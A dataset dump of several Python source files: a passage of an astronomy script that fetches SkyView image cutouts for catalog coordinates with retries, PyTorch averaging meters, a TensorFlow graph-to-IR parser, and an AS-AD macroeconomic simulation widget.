    dec_colname = coordinfo['Dec_colname']
    # NOTE(review): ra_units/dec_units are only bound inside these branches;
    # unrecognized unit strings would raise NameError at the SkyCoord call.
    if coordinfo['RA_units'] == 'hms':
        ra_units = U.hourangle
    if (coordinfo['Dec_units'] == 'dms') or (coordinfo['Dec_units'] == 'deg'):
        dec_units = U.deg
    catalog = ascii.read(catalogfile)
    ra = catalog[ra_colname]
    dec = catalog[dec_colname]
    coords = SkyCoord(ra, dec, unit=(ra_units, dec_units), equinox=coordinfo['epoch'], frame='icrs')

    # Build a boolean selection mask from the optional subset criteria.
    # NOTE(review): NP.bool / NP.float / NP.int aliases were removed in
    # NumPy >= 1.24; this code assumes an older NumPy.
    subsetinfo = parms['subset']
    subparnames = subsetinfo['parmnames']
    select = NP.ones(len(catalog), dtype=NP.bool)
    if len(subparnames) > 0:
        parmranges = subsetinfo['parmrange']
        for i,prm in enumerate(subparnames):
            subdat = catalog[prm]
            if (subdat.dtype == NP.float) or (subdat.dtype == NP.int):
                # Numeric column: keep rows inside [lo, hi].
                select[NP.logical_or(subdat < parmranges[i][0], subdat > parmranges[i][1])] = False
            else:
                # String column: substring match; a leading '!' negates.
                for prmstr in parmranges[i]:
                    if prmstr[0] == '!':
                        pstr = prmstr[1:]
                        select = NP.logical_and(select, NP.logical_not(NP.asarray([pstr in subdat[j] for j in range(len(subdat))])))
                    else:
                        pstr = prmstr
                        select = NP.logical_and(select, NP.asarray([pstr in subdat[j] for j in range(len(subdat))]))
    select_ind = NP.where(select)[0]

    # Image retrieval parameters.
    imgparms = parms['image']
    survey = imgparms['survey']
    projection = imgparms['projection']
    pixels = imgparms['pixels']
    action = imgparms['action']
    overwrite = imgparms['overwrite']

    # NOTE(review): err.message is Python 2 only; on Python 3 the warn()
    # formatting itself would raise AttributeError — str(err) would be portable.
    if action.lower() == 'download':
        # Download each cutout as a FITS file, then retry transient failures.
        failure_count = 0
        failed_coords = []
        for ii,ind in enumerate(select_ind):
            radec_hmsdms = coords[ind].to_string('hmsdms')
            outfname = outdir + '{0}_{1[0]:0d}x{1[1]:0d}.fits'.format(radec_hmsdms.replace(' ',''), pixels)
            if (not os.path.isfile(outfname)) or overwrite:
                try:
                    paths = SkyView.get_images(radec_hmsdms, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
                    hdulist = paths[0][0]
                    hdulist.writeto(outfname, overwrite=True, output_verify='warn')
                    print('Successfully saved {0} [{1:0d}/{2:0d}]'.format(outfname, ii+1, select_ind.size))
                except Exception as err:
                    warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(radec_hmsdms, err.message), Warning)
                    if isinstance(err, AttributeError):
                        # For some reason, timeouts come under Attribute Error.
                        # There will be retries on these failures, but not others
                        # such as pointing outside the survey area, etc.
                        failure_count += 1
                        failed_coords += [radec_hmsdms]
        if failure_count > 0:
            # Process the failures
            failurefile = projectdir + parms['failure']['failurefile']
            n_retry = parms['failure']['retry']
            success_coords = []
            if n_retry > 0:
                # Retry the failed retrievals
                for iretry in range(n_retry):
                    if len(success_coords) < len(failed_coords):
                        for indfail, failcoord in enumerate(failed_coords):
                            if failcoord not in success_coords:
                                outfname = outdir + '{0}_{1[0]:0d}x{1[1]:0d}.fits'.format(failcoord.replace(' ',''), pixels)
                                try:
                                    paths = SkyView.get_images(failcoord, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
                                    hdulist = paths[0][0]
                                    hdulist.writeto(outfname, overwrite=True, output_verify='warn')
                                except Exception as err:
                                    warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(failcoord, err.message), Warning)
                                else: # Successful retrieval
                                    failure_count -= 1
                                    success_coords += [failcoord]
            if len(success_coords) < len(failed_coords):
                # Write information about failed retrievals to a file
                print('Failed to retrieve {0:0d}/{1:0d} images. Failed coordinates listed in {2}'.format(failure_count-len(success_coords), select_ind.size, failurefile))
                final_failed_coords = NP.setdiff1d(failed_coords, success_coords)
                NP.savetxt(failurefile, final_failed_coords, fmt='%s')
    else: # just query for image locations
        # Only resolve the image URLs and save them to a text table.
        failure_count = 0
        failed_coords = []
        success_coords = []
        paths = []
        for ii,ind in enumerate(select_ind):
            radec_hmsdms = coords[ind].to_string('hmsdms')
            try:
                imgfiles = SkyView.get_images(radec_hmsdms, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
            except Exception as err:
                warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(radec_hmsdms, err.message), Warning)
                if isinstance(err, AttributeError):
                    # For some reason, timeouts come under Attribute Error.
                    # There will be retries on these failures, but not others
                    # such as pointing outside the survey area, etc.
                    failure_count += 1
                    failed_coords += [radec_hmsdms]
            else:
                paths += [SkyView.get_image_list(radec_hmsdms, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)[0]]
                success_coords += [radec_hmsdms]
                print('Successfully located {0} [{1:0d}/{2:0d}]'.format(radec_hmsdms, len(paths), select_ind.size))
        if failure_count > 0:
            # Process the failures
            failurefile = projectdir + parms['failure']['failurefile']
            n_retry = parms['failure']['retry']
            if n_retry > 0:
                # Retry the failed retrievals
                for iretry in range(n_retry):
                    if len(success_coords) < len(failed_coords):
                        for indfail, failcoord in enumerate(failed_coords):
                            if failcoord not in success_coords:
                                try:
                                    imgfiles = SkyView.get_images(failcoord, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)
                                except Exception as err:
                                    warnings.warn('Problem with retrieving image at {0}.\nEncountered error: {1}.\nProceeding to the next object...\n'.format(failcoord, err.message), Warning)
                                else: # Successful retrieval
                                    paths += [SkyView.get_image_list(failcoord, survey=survey, pixels=pixels, coordinates=coordinfo['epoch'], projection=projection)[0]]
                                    failure_count -= 1
                                    success_coords += [failcoord]
            if len(success_coords) < len(failed_coords):
                # Write information about failed retrievals to a file
                print('Failed to retrieve {0:0d}/{1:0d} images. Failed coordinates listed in {2}'.format(failure_count-len(success_coords), select_ind.size, failurefile))
                final_failed_coords = NP.setdiff1d(failed_coords, success_coords)
                NP.savetxt(failurefile, final_failed_coords, fmt='%s')
        # Save the resolved URLs alongside their coordinates.
        outfname = outdir + 'image_locations.txt'
        final_success_coords = [coord.replace(' ', '') for coord in success_coords]
        outdata = Table([final_success_coords, paths], names=['RA-Dec', 'URL'])
        ascii.write(outdata, outfname, overwrite=True)
| 51.666667 | 230 | 0.579059 | 1,014 | 9,455 | 5.268245 | 0.215976 | 0.043804 | 0.020217 | 0.026956 | 0.618869 | 0.593411 | 0.579184 | 0.579184 | 0.579184 | 0.579184 | 0 | 0.010489 | 0.314331 | 9,455 | 182 | 231 | 51.950549 | 0.813512 | 0.065362 | 0 | 0.481752 | 0 | 0.043796 | 0.137786 | 0.011454 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.065693 | 0 | 0.065693 | 0.029197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7f80c48ea0ad3af7aa369fcecffd5a6eb1a3ba | 2,147 | py | Python | reid/utils/meters.py | ZoRoronoa/Camera-Aware-Proxy | 352f900bbae330f18c2bfe2b3f2516fb4e31adea | [
"Apache-2.0"
] | 37 | 2021-02-05T11:49:17.000Z | 2022-03-13T15:42:40.000Z | reid/utils/meters.py | ZoRoronoa/Camera-Aware-Proxy | 352f900bbae330f18c2bfe2b3f2516fb4e31adea | [
"Apache-2.0"
] | 7 | 2021-03-30T01:33:40.000Z | 2022-03-24T07:54:33.000Z | reid/utils/meters.py | ZoRoronoa/Camera-Aware-Proxy | 352f900bbae330f18c2bfe2b3f2516fb4e31adea | [
"Apache-2.0"
] | 9 | 2021-03-06T02:43:55.000Z | 2022-03-26T07:32:19.000Z | from __future__ import absolute_import
import torch
class AverageMeter(object):
    """Computes and stores the average and current value"""

    def __init__(self):
        # Delegate to reset() so the initial state is defined in one place
        # (previously the zeroing code was duplicated here).
        self.reset()

    def reset(self):
        """Clear all statistics."""
        self.val = 0    # most recent value
        self.avg = 0    # running average
        self.sum = 0    # weighted sum of all values
        self.count = 0  # total weight seen so far

    def update(self, val, n=1):
        """Record ``val`` observed ``n`` times and refresh the average."""
        self.val = val
        self.sum += val * n
        self.count += n
        self.avg = self.sum / self.count
class CatMeter:
    '''
    Concatenate Meter for torch.Tensor
    '''

    def __init__(self):
        self.reset()

    def reset(self):
        # Nothing collected yet.
        self.val = None

    def update(self, val):
        """Append ``val`` along dim 0; the first update simply stores it."""
        self.val = val if self.val is None else torch.cat([self.val, val], dim=0)

    def get_val(self):
        return self.val

    def get_val_numpy(self):
        return self.val.data.cpu().numpy()
class MultiItemAverageMeter:
    """Tracks running averages for several named quantities at once."""

    def __init__(self):
        # key -> {'avg': ..., 'sum': ..., 'count': ...}
        self.content = {}

    def update(self, val):
        '''
        :param val: dict, keys are strs, values are torch.Tensor or np.array
        '''
        for key in list(val.keys()):
            value = val[key]
            if key not in list(self.content.keys()):
                self.content[key] = {'avg': value, 'sum': value, 'count': 1.0}
            else:
                self.content[key]['sum'] += value
                self.content[key]['count'] += 1.0
                self.content[key]['avg'] = self.content[key]['sum'] / self.content[key]['count']

    def get_val(self):
        """Return (keys, averages); tensor averages are converted to numpy."""
        keys = list(self.content.keys())
        values = []
        for key in keys:
            try:
                values.append(self.content[key]['avg'].data.cpu().numpy())
            except AttributeError:
                # Fix: narrowed from a bare except. Plain numbers and numpy
                # arrays have no .data.cpu() chain; use the value as-is.
                values.append(self.content[key]['avg'])
        return keys, values

    def get_str(self):
        """Render all averages as 'key: value; ' pairs."""
        result = ''
        keys, values = self.get_val()
        for key, value in zip(keys, values):
            result += key
            result += ': '
            result += str(value)
            result += '; '
        return result
| 23.593407 | 96 | 0.509548 | 263 | 2,147 | 4.072243 | 0.243346 | 0.084967 | 0.104575 | 0.063492 | 0.153128 | 0.130719 | 0.076564 | 0.076564 | 0.076564 | 0.076564 | 0 | 0.010174 | 0.359106 | 2,147 | 90 | 97 | 23.855556 | 0.768169 | 0.071262 | 0 | 0.33871 | 0 | 0 | 0.021047 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.193548 | false | 0 | 0.032258 | 0.032258 | 0.33871 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e7fe42e15d58a7e1ef059e38eb976549da0eb6f | 12,940 | py | Python | graph.py | ARM-software/DeepFreeze | 57ca195ecac37bbacf1a17d62bd22d355ee8bcb6 | [
"MIT"
] | 35 | 2019-02-11T21:00:09.000Z | 2022-03-26T05:33:45.000Z | graph.py | patrickthomashansen/DeepFreeze | 57ca195ecac37bbacf1a17d62bd22d355ee8bcb6 | [
"MIT"
] | 2 | 2019-10-10T10:06:35.000Z | 2021-09-16T18:07:22.000Z | graph.py | patrickthomashansen/DeepFreeze | 57ca195ecac37bbacf1a17d62bd22d355ee8bcb6 | [
"MIT"
] | 18 | 2019-02-12T16:11:09.000Z | 2022-02-12T18:04:52.000Z | #!/usr/bin/env python
"""
Author: Patrick Hansen
Project: FixyNN
Defines Graph and Layer classes used for intermediate representation
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import json
# Canonical layer-type identifiers used throughout the IR.
DEPTHWISE_SEPARABLE_CONV_2D = "ds_conv_2d"
DEPTHWISE_CONV_2D = "dw_conv_2d"
CONV_2D = "conv_2d"
DENSE = "dense"
MAX_POOL_2D = "max_pool_2d"
AVG_POOL_2D = "avg_pool_2d"
FLATTEN = "flatten"
# Groupings used for layer-kind membership tests.
LAYER_TYPES_CONV = [DEPTHWISE_SEPARABLE_CONV_2D, DEPTHWISE_CONV_2D, CONV_2D]
LAYER_TYPES_POOL = [MAX_POOL_2D, AVG_POOL_2D]
LAYER_TYPES_2D = LAYER_TYPES_CONV + LAYER_TYPES_POOL
LAYER_TYPES_TRAINABLE = LAYER_TYPES_CONV + [DENSE]
# TensorFlow op-type names for activation functions; entries left as None are
# skipped during activation lookup (their TF op names are not handled here).
RELU = "Relu"
RELU6 = "Relu6"
SOFTMAX = None
SIGMOID = None
TANH = None
ACTIVATION_FUNCTIONS = [RELU, RELU6, SOFTMAX, SIGMOID, TANH]
def get_tf_graph_from_meta(meta_graph_filepath):
    """Import a MetaGraph file into (and return) the default TF graph."""
    tf.train.import_meta_graph(meta_graph_filepath)
    return tf.get_default_graph()
def get_tf_graph_from_pb(frozen_model_filepath):
    """Load a frozen .pb GraphDef into (and return) the default TF graph."""
    with tf.io.gfile.GFile(frozen_model_filepath, 'rb') as f:
        graph_def = tf.compat.v1.GraphDef()
        graph_def.ParseFromString(f.read())
    tf.compat.v1.import_graph_def(graph_def, name='')
    return tf.compat.v1.get_default_graph()
def get_endpoints(endpoints_filepath, graph):
    """Load a JSON {layer name -> tensor name} mapping and resolve each tensor.

    Fix: ``dict.iteritems()`` is Python 2 only; ``items()`` works on both
    Python 2 and 3.
    """
    with open(endpoints_filepath, "r") as f:
        endpoints_by_name = json.load(f)
    endpoints = {k: graph.get_tensor_by_name(v) for k, v in endpoints_by_name.items()}
    return endpoints
def get_layer_name(tensor, endpoints):
    """Find the name given to the endpoint corresponding to node.

    Returns None when ``tensor`` matches none of the endpoint tensors.
    (Fix: ``dict.iteritems()`` is Python 2 only; ``items()`` is portable.)
    """
    for name, _tensor in endpoints.items():
        if tensor == _tensor:
            return name
    return None
def get_tensor_shape(tensor):
    """Returns the tensor shape as a list of ints/None"""
    def _dim_or_none(dim):
        try:
            return int(dim)
        except:
            # Unknown/dynamic dimensions cannot be cast to int.
            return None
    return [_dim_or_none(dim) for dim in tensor.shape]
def get_variable_from_graph(graph, ckpt, variable):
    """Extract the value of a variable from a checkpoint"""
    with tf.Session(graph=graph) as sess:
        if ckpt:
            # Restore trained values; with no checkpoint the graph is run
            # as-is (e.g. constants baked into a frozen graph).
            tf.train.Saver().restore(sess, ckpt)
        return sess.run(variable)
class Graph():
    """Ordered collection of Layer objects forming a linear network IR."""

    def __init__(self, name):
        self.name = name
        self.layers = []               # Layer objects currently in the graph
        self.removed_layer_names = []  # names pruned so far; filtered from new layers' edges

    def __str__(self):
        result = "GRAPH: %s\n" % self.name
        ordered = self.get_ordered_layers()
        ordered_names = [layer.name for layer in ordered]
        result += "\tlayers: %s\n" % " -> ".join(ordered_names)
        for layer in ordered:
            result += "\t" +str(layer).replace("\n", "\n\t") + "\n"
        return result

    def add_layer(self, layer):
        """Add a layer, dropping its references to previously removed layers.

        (Fix: removed a dead local that concatenated input/output names.)
        """
        for layer_name in self.removed_layer_names:
            if layer_name in layer.input_names:
                layer.input_names.remove(layer_name)
            if layer_name in layer.output_names:
                layer.output_names.remove(layer_name)
        self.layers.append(layer)

    def remove_layer(self, layer):
        """Remove a layer and scrub its name from remaining layers' edges.

        (Fix: the scrub loop's variable no longer shadows the parameter.)
        """
        layer_name = layer.name
        if layer in self.layers:
            self.layers.remove(layer)
        for other in self.layers:
            if layer_name in other.input_names:
                other.input_names.remove(layer_name)
            if layer_name in other.output_names:
                other.output_names.remove(layer_name)
        self.removed_layer_names.append(layer_name)

    def find_layer(self, name):
        """Return the layer with the given name, or None."""
        for layer in self.layers:
            if layer.name == name:
                return layer
        return None

    def get_input_layer(self):
        """Return the layer with no inputs (the network entry), or None."""
        for layer in self.layers:
            if not layer.input_names:
                return layer
        return None

    def get_output_layer(self):
        """Return the layer with no outputs (the network exit), or None."""
        for layer in self.layers:
            if not layer.output_names:
                return layer
        return None

    def get_next_layer(self, cur_layer):
        """Return the successor of ``cur_layer``, or None at the graph end."""
        if cur_layer and cur_layer.output_names:
            next_layer_name = cur_layer.output_names[0] # TODO: enable branching
            next_layer = self.find_layer(next_layer_name)
            return next_layer
        else:
            return None

    def get_previous_layer(self, cur_layer):
        """Return the predecessor of ``cur_layer``, or None at the graph start."""
        if cur_layer and cur_layer.input_names:
            previous_layer_name = cur_layer.input_names[0] # TODO: enable branching
            previous_layer = self.find_layer(previous_layer_name)
            return previous_layer
        else:
            return None

    def get_ordered_layers(self):
        """Walk input -> output and return the layers in execution order."""
        ordered = []
        cur_layer = self.get_input_layer()
        while cur_layer:
            ordered += [cur_layer]
            cur_layer = self.get_next_layer(cur_layer)
        return ordered
class Layer():
    """IR wrapper around the TF ops/tensors that make up one network layer.

    Portability fixes applied: ``dict.iteritems()`` -> ``items()`` (Python 2
    only), and ``== None`` -> ``is None`` (TF tensors overload ``==``, so
    identity checks must use ``is``).
    """

    def __init__(self, name, endpoints, graph, ckpt):
        self._endpoints = endpoints            # layer name -> endpoint tensor
        self._tensor = self._endpoints[name]   # this layer's output tensor
        self._layer_ops = self.__get_layer_ops()
        self.name = name
        self.op_type = self.__get_op_type()
        self.adder_pipeline = 1 # with pipeline
        self.bram_mult = 1 # no bram multipliers
        self.adder_tree = 1 # with adder_tree
        self.input_names = self.__get_input_layer_names()
        self.output_names = self.__get_output_layer_names()
        self.input_shapes = self.__get_input_shapes()
        self.output_shape = self.__get_output_shape()
        if self.op_type in LAYER_TYPES_TRAINABLE:
            self.weights = self.__get_weights(graph, ckpt)
            self.bias = self.__get_bias(graph, ckpt)
        if self.op_type in LAYER_TYPES_2D:
            self.kernel_size = self.__get_kernel_size()
            self.strides = self.__get_strides()
            self.padding = self.__get_padding()
        self.activation_function = self.__get_activation_function()

    def __str__(self):
        result = "LAYER: %s\n" % self.name
        result += "\top type: %s\n" % self.op_type
        result += "\tinputs: %s\n" % self.input_names
        result += "\toutputs: %s\n" % self.output_names
        result += "\tinput shapes: %s\n" % self.input_shapes
        result += "\toutput shape: %s\n" % self.output_shape
        result += "\tactivation function: %s\n" % self.activation_function
        if self.op_type in LAYER_TYPES_TRAINABLE:
            if self.op_type == DEPTHWISE_SEPARABLE_CONV_2D:
                result += "\tdepthwise weights shape: %s\n" % (self.weights[0].shape,)
                result += "\tpointwise weights shape: %s\n" % (self.weights[1].shape,)
            else:
                result += "\tweights shape: %s\n" % (self.weights.shape,)
            result += "\tbias shape: %s\n" % (self.bias.shape,)
        if self.op_type in LAYER_TYPES_2D:
            result += "\tkernel size: %s\n" % (self.kernel_size,)
            result += "\tstrides: %s\n" % (self.strides,)
            result += "\tpadding: %s" % self.padding
        return result

    def __get_input_layer_names(self, tensor=None):
        """Return a list of all layer names that are direct inputs to this layer"""
        if tensor is None:
            tensor = self._tensor
        inputs = []
        for inp in tensor.op.inputs:
            if inp in self._endpoints.values():
                inputs += [get_layer_name(inp, self._endpoints)]
            else:
                # Recurse through intermediate tensors until endpoints are hit.
                inputs += self.__get_input_layer_names(inp)
        return list(set(inputs))

    def __get_output_layer_names(self):
        """Return a list of all layer names that are direct outputs of this layer"""
        outputs = []
        for name, tensor in self._endpoints.items():
            if self.name in self.__get_input_layer_names(tensor):
                outputs += [name]
        return outputs

    def __get_layer_ops(self, tensor=None):
        """Return a list of all ops in this layer"""
        if tensor is None:
            tensor = self._tensor
        layer_ops = [tensor.op]
        for inp in tensor.op.inputs:
            if inp not in self._endpoints.values():
                layer_ops += self.__get_layer_ops(inp)
        return list(set(layer_ops))

    def __get_op_type(self):
        """Determine the operation type of this layer"""
        layer_ops_types = [op.type for op in self._layer_ops]
        if "DepthwiseConv2dNative" in layer_ops_types and \
           "Conv2D" in layer_ops_types:
            return DEPTHWISE_SEPARABLE_CONV_2D
        elif "DepthwiseConv2dNative" in layer_ops_types:
            return DEPTHWISE_CONV_2D
        elif "Conv2D" in layer_ops_types:
            return CONV_2D
        elif "MatMul" in layer_ops_types:
            return DENSE
        elif "MaxPool" in layer_ops_types:
            return MAX_POOL_2D
        elif "AvgPool" in layer_ops_types:
            return AVG_POOL_2D
        elif "Reshape" in layer_ops_types:
            return FLATTEN
        else:
            raise Exception("Could not match layer with a known op type")

    def __get_ops_by_type(self, op_type):
        """Return the layer's ops whose type matches; None when op_type is None."""
        if op_type is None:
            return None
        ops = []
        for op in self._layer_ops:
            if op.type == op_type:
                ops.append(op)
        return ops

    def __get_input_shapes(self):
        """Return a list of all input activation tensor shapes to node"""
        if not self.input_names:
            # No endpoint inputs: walk up the op chain to the network input.
            tensor = self._tensor
            while tensor.op.inputs:
                shape = get_tensor_shape(tensor)
                tensor = tensor.op.inputs[0]
                if not get_tensor_shape(tensor) or \
                   (self.op_type in LAYER_TYPES_2D and len(get_tensor_shape(tensor)) != 4):
                    return [shape]
            return [get_tensor_shape(tensor)]
        else:
            return [get_tensor_shape(self._endpoints[x]) for x in self.input_names]

    def __get_output_shape(self):
        """Shape of this layer's output endpoint tensor."""
        return get_tensor_shape(self._tensor)

    def __get_weights(self, graph, ckpt):
        """Extract weight parameters from a layer"""
        if self.op_type == DEPTHWISE_SEPARABLE_CONV_2D:
            depthwise_weights = self.__get_ops_by_type("DepthwiseConv2dNative")[0].inputs[1]
            pointwise_weights = self.__get_ops_by_type("Conv2D")[0].inputs[1]
            return [
                get_variable_from_graph(graph, ckpt, depthwise_weights),
                get_variable_from_graph(graph, ckpt, pointwise_weights)
            ]
        elif self.op_type == DEPTHWISE_CONV_2D:
            weights = self.__get_ops_by_type("DepthwiseConv2dNative")[0].inputs[1]
            return get_variable_from_graph(graph, ckpt, weights)
        elif self.op_type == CONV_2D:
            weights = self.__get_ops_by_type("Conv2D")[0].inputs[1]
            return get_variable_from_graph(graph, ckpt, weights)
        elif self.op_type == DENSE:
            weights = self.__get_ops_by_type("MatMul")[0].inputs[1]
            return get_variable_from_graph(graph, ckpt, weights)
        else:
            raise Exception("No weights found in layer: %s" % self.name)

    def __get_bias(self, graph, ckpt):
        """Extract bias parameters from a layer"""
        bias = None
        bias_add_ops = self.__get_ops_by_type("BiasAdd")
        add_ops = self.__get_ops_by_type("Add")
        if bias_add_ops:
            assert(len(bias_add_ops) == 1)
            bias = bias_add_ops[0].inputs[1]
        if add_ops:
            # Fall back to a plain Add whose second input looks like a bias.
            for op in add_ops:
                if "bias" in op.inputs[1].name.lower():
                    bias = op.inputs[1]
        if bias is None:
            # No bias in the graph: substitute zeros of the output depth.
            return np.zeros((self.output_shape[-1]))
        else:
            return get_variable_from_graph(graph, ckpt, bias)

    def __get_batch_norm(self, graph, ckpt):
        pass # TODO

    def __get_2d_op(self):
        """Returns the desired 2d op for the given layer type"""
        if self.op_type in [DEPTHWISE_SEPARABLE_CONV_2D, DEPTHWISE_CONV_2D]:
            return self.__get_ops_by_type("DepthwiseConv2dNative")[0]
        elif self.op_type == CONV_2D:
            return self.__get_ops_by_type("Conv2D")[0]
        elif self.op_type == MAX_POOL_2D:
            return self.__get_ops_by_type("MaxPool")[0]
        elif self.op_type == AVG_POOL_2D:
            return self.__get_ops_by_type("AvgPool")[0]
        else:
            raise Exception("No 2d operations in layer: %s" % self.name)

    def __get_kernel_size(self):
        """(height, width) of the conv/pool kernel."""
        if self.op_type == DEPTHWISE_SEPARABLE_CONV_2D:
            return self.weights[0].shape[0:2]
        elif self.op_type in [DEPTHWISE_CONV_2D, CONV_2D]:
            return self.weights.shape[0:2]
        elif self.op_type in [MAX_POOL_2D, AVG_POOL_2D]:
            op = self.__get_2d_op()
            kernel_size = op.get_attr("ksize")
            return (int(kernel_size[1]), int(kernel_size[2]))
        else:
            raise Exception("No kernel size for layer: %s" % self.name)

    def __get_strides(self):
        """(height, width) strides of the 2d op."""
        op = self.__get_2d_op()
        strides = op.get_attr("strides")
        return (int(strides[1]), int(strides[2]))

    def __get_padding(self):
        """Padding attribute of the 2d op (e.g. b'SAME'/b'VALID')."""
        op = self.__get_2d_op()
        padding = op.get_attr("padding")
        return padding

    def __get_activation_function(self):
        """First known activation op found in this layer, or None."""
        for fn in ACTIVATION_FUNCTIONS:
            if self.__get_ops_by_type(fn):
                return fn
        return None
def parse_tf_graph(
        model_name, endpoints_filepath, meta_filepath, checkpoint_filepath, pb_filepath,
        input_layer_name=None, output_layer_name=None
):
    """Parses a Tensorflow model into an intermediate representation"""
    # Load either a frozen .pb or a meta-graph + checkpoint pair.
    if pb_filepath is None:
        assert(meta_filepath and checkpoint_filepath)
        tf_graph = get_tf_graph_from_meta(meta_filepath)
    else:
        tf_graph = get_tf_graph_from_pb(pb_filepath)

    endpoints = get_endpoints(endpoints_filepath, tf_graph)

    graph = Graph(model_name)
    for endpoint_name in endpoints.keys():
        graph.add_layer(Layer(endpoint_name, endpoints, tf_graph, checkpoint_filepath))

    def _trim_until(target_name, boundary_getter):
        # Drop boundary layers until the requested layer becomes the boundary.
        if target_name is None:
            return
        boundary = boundary_getter()
        while boundary.name != target_name:
            graph.remove_layer(boundary)
            boundary = boundary_getter()

    _trim_until(input_layer_name, graph.get_input_layer)
    _trim_until(output_layer_name, graph.get_output_layer)

    print(graph)
    return graph
| 31.715686 | 87 | 0.708346 | 1,935 | 12,940 | 4.411886 | 0.116796 | 0.027059 | 0.023427 | 0.018273 | 0.383859 | 0.292492 | 0.226309 | 0.17922 | 0.109758 | 0.099684 | 0 | 0.009309 | 0.186476 | 12,940 | 407 | 88 | 31.793612 | 0.801653 | 0.06847 | 0 | 0.208589 | 0 | 0 | 0.060523 | 0.008765 | 0 | 0 | 0 | 0.002457 | 0.006135 | 1 | 0.104294 | false | 0.003067 | 0.02454 | 0.003067 | 0.300614 | 0.006135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e80269c55cc32cafd338f05fdf62d0ccbc5eba4 | 2,059 | py | Python | numecon/course_macro1/asad.py | minjiedeng/NumEcon | ff021e765344db93eed7ff0002dbdf3e50e528e9 | [
"MIT"
] | 1 | 2021-10-03T12:23:34.000Z | 2021-10-03T12:23:34.000Z | numecon/course_macro1/asad.py | minjiedeng/NumEcon | ff021e765344db93eed7ff0002dbdf3e50e528e9 | [
"MIT"
] | null | null | null | numecon/course_macro1/asad.py | minjiedeng/NumEcon | ff021e765344db93eed7ff0002dbdf3e50e528e9 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import ipywidgets as widgets
def simulate(a=0.4,gamma=0.1,phi=0.9,delta=0.8,omega=0.15,sigma_x=1,sigma_c=0.2,T=100):
widgets.interact(simulate_,
a=widgets.fixed(a),
gamma=widgets.fixed(gamma),
phi=widgets.fixed(phi),
delta=widgets.fixed(delta),
omega=widgets.fixed(omega),
sigma_x=widgets.FloatSlider(description='$\\sigma_{x}$',min=0.00, max=2.0, step=0.01, value=sigma_x),
sigma_c=widgets.FloatSlider(description='$\\sigma_{c}$',min=0.00, max=2.0, step=0.01, value=sigma_c),
T=widgets.fixed(T),
)
def simulate_(a,phi,gamma,delta,omega,sigma_x,sigma_c,T):
np.random.seed(2015)
# a. parameters
b = (1+a*phi*gamma)/(1+a*gamma)
beta = 1/(1+a*gamma)
# b. function
y_hat_func = lambda y_hat_lag,z,z_lag,s,s_lag: b*y_hat_lag + beta*(z-z_lag) - a*beta*s + a*beta*phi*s_lag
pi_hat_func = lambda pi_lag,z,z_lag,s,s_lag: b*pi_lag + beta*gamma*z - beta*phi*gamma*z_lag + beta*s - beta*phi*s_lag
z_func = lambda z_lag,x: delta*z_lag + x
s_func = lambda s_lag,c: omega*s_lag + c
# c. simulation
x = np.random.normal(loc=0,scale=sigma_x,size=T)
c = np.random.normal(loc=0,scale=sigma_c,size=T)
z = np.zeros(T)
s = np.zeros(T)
y_hat = np.zeros(T)
pi_hat = np.zeros(T)
for t in range(1,T):
# i. update z and s
z[t] = z_func(z[t-1],x[t])
s[t] = s_func(s[t-1],c[t])
# ii. compute y og pi
y_hat[t] = y_hat_func(y_hat[t-1],z[t],z[t-1],s[t],s[t-1])
pi_hat[t] = pi_hat_func(pi_hat[t-1],z[t],z[t-1],s[t],s[t-1])
# d. figure
fig = plt.figure(figsize=(8,6),dpi=100)
ax = fig.add_subplot(1,1,1)
ax.plot(y_hat,label='$\\hat{y}$')
ax.plot(pi_hat,label='$\\hat{pi}$')
ax.set_xlabel('time')
ax.set_ylabel('percent')
ax.set_ylim([-8,8])
ax.grid(ls='--', lw=1)
legend = ax.legend(loc='upper left', shadow=True)
frame = legend.get_frame()
frame.set_facecolor('0.90')
| 30.731343 | 121 | 0.599806 | 397 | 2,059 | 2.964736 | 0.244332 | 0.027188 | 0.027188 | 0.057774 | 0.144435 | 0.144435 | 0.144435 | 0.096856 | 0.073067 | 0.073067 | 0 | 0.040516 | 0.208839 | 2,059 | 66 | 122 | 31.19697 | 0.682014 | 0.042739 | 0 | 0 | 0 | 0 | 0.037678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0 | 0.068182 | 0 | 0.113636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
